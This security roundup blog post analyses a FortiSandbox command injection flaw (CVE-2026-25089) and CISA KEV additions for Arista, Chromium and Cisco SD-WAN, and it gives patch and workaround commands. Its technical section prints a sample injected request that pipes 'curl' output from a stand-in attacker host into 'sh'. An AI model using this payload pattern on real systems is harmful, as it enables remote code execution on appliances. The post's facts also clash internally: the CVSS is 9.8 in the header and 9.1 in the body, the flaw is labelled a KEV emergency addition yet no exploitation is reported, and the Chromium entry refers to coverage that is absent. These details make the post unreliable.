CVE-2026-25089: FortiSandbox Unauthenticated RCE + CISA KEV June 9 Additions (Arista, Cisco SD-WAN)

Technical root cause for the unauthenticated OS command injection vulnerability in Fortinet FortiSandbox appliances.

CVE-2026-25089: FortiSandbox Unauthenticated RCE + CISA KEV June 9 Additions (Arista, Cisco SD-WAN)
📌
Security Roundup Series: Week of June 12, 2026 • 4 min read deep dive
🚨
Threat Intelligence & Technical Specs: CVE ID: CVE-2026-25089 Severity: CVSS 9.8 Status: CISA KEV Emergency Addition Target Component: Fortinet FortiSandbox

This post is part of the Week of June 12, 2026 Security Roundup.


Part 1: CVE-2026-25089 — FortiSandbox Unauthenticated OS Command Injection (CVSS 9.1)

Vulnerability Overview

CVE-2026-25089 is a critical OS command injection (CWE-78) in the FortiSandbox Web UI. The vulnerability exists in the "start VNC" feature of the GUI, where specially crafted JSON input triggers a second-order command injection, allowing an unauthenticated remote attacker to execute arbitrary OS commands as root on the underlying system.

CVE: CVE-2026-25089
CVSS v3.1: 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
CWE: CWE-78 (OS Command Injection)
Advisory: FG-IR-26-141 (Fortinet, June 9, 2026)
Discovery: Adham El Karn, Fortinet Product Security Team
Active exploitation: None reported at time of writing

Affected Versions

  • FortiSandbox 5.0.0 – 5.0.5 → fix: 5.0.6
  • FortiSandbox 4.4.0 – 4.4.8 → fix: 4.4.9
  • FortiSandbox 4.2.x (all) → upgrade required
  • FortiSandbox Cloud 5.0.4 – 5.0.5 → fix: Cloud 5.0.6
  • FortiSandbox PaaS 5.0.4 – 5.0.5 → fix: PaaS 5.0.6

Technical Analysis

The vulnerability is a second-order command injection. The "start VNC" endpoint in the FortiSandbox Web UI accepts JSON parameters including a session identifier or hostname field. This value is insufficiently sanitized before being passed to a shell command within the application's backend process. By injecting shell metacharacters (;, |, $(...), backticks) into the JSON field, an attacker can inject arbitrary commands that execute when the backend processes the request.

# Simplified illustration of the vulnerability class (not working exploit):
# Normal request:
POST /api/v1/sandbox/vnc/start
{"session_id": "abc123"}

# Malicious request:
POST /api/v1/sandbox/vnc/start
{"session_id": "abc123; curl http://attacker.com/payload | sh #"}

# Backend (vulnerable pseudocode):
os.system(f"start-vnc-session {session_id}")  # session_id is unsanitized

Remediation

# Step 1: Identify your FortiSandbox version
# Via FortiSandbox CLI:
get system status | grep Version

# Step 2: Upgrade to fixed version
# FortiSandbox 5.0.6: https://support.fortinet.com/
# FortiSandbox 4.4.9: https://support.fortinet.com/

# Step 3: Workaround (if immediate upgrade is not possible)
# Restrict web UI access to management networks only:
config system admin setting
    set access-protocol https
    set http-redirect enable
end
# Apply ACL to management interface to restrict source IPs

# Step 4: Verify your installation post-patch
get system status | grep "FortiSandbox"
# Confirm version shows 5.0.6, 4.4.9, or later

Part 2: CISA KEV Additions — June 9, 2026

CISA added three vulnerabilities to the Known Exploited Vulnerabilities catalog on June 9, 2026. FCEB agencies have until June 23, 2026 to remediate.

CVE-2026-7473 — Arista EOS Incomplete Comparison Vulnerability

Arista's Extensible Operating System (EOS) contains an incomplete comparison vulnerability (CWE-697) that can be exploited by an attacker with network access to the management interface. Network operators: consult Arista's June 2026 Security Advisory for affected EOS versions and patch instructions. Upgrade EOS via show version → install source workflow on your Arista devices.

CVE-2026-11645 — Google Chromium V8 OOB (covered above)

See the Chrome V8 Zero-Day deep-dive for full technical analysis.

CVE-2026-20245 — Cisco Catalyst SD-WAN Manager Improper Output Encoding

An improper encoding or escaping of output (CWE-116) in Cisco Catalyst SD-WAN Manager allows an authenticated attacker to inject malicious content. If SD-WAN Manager is internet-facing (not recommended), this becomes a higher-priority patch. Consult Cisco Security Advisory for affected SD-WAN Manager versions and upgrade paths.

# Arista EOS: check version and available patches
show version
# Then upgrade via:
# bash sudo install source aboot://EOS-x.y.z.swi

# Cisco SD-WAN Manager: check version
show sdwan version
# Apply patches per Cisco Security Advisory
# Use Cisco's standard firmware upgrade workflow via vManage UI

Additional June 2026 Vendor Patches

Ivanti: Multiple critical vulnerabilities patched in Ivanti Connect Secure and Ivanti Policy Secure. Ivanti products have been a persistent target in 2026; apply patches immediately and review your Ivanti deployment for signs of prior compromise using Ivanti's Integrity Checker Tool (ICT).

SAP: June 2026 Security Patch Day addressed multiple critical vulnerabilities including authentication bypass and remote code execution issues in SAP NetWeaver and related components. Follow SAP ONE Support Launchpad for patch deployment guidance.


Read more

Brecha de Datos Médicos en Photon Health

Filtración en Photon Health: Zero-Day de Inyección SQL en Metabase Expone Recetas Médicas de Pacientes

📌Security Roundup Series: Semana del 9 de Octubre de 2026 • 4 min read deep dive🏛️Incident Overview: Target / Organization: Photon Health, Inc. (Plataforma de Prescripción Médica Digital) Threat Actor / Attribution: Actor Desconocido (Extorsión Financiera) Impact / Records Compromised: Nombres de pacientes, direcciones, números de teléfono, fechas de nacimiento, recetas médicas completas

By James Luther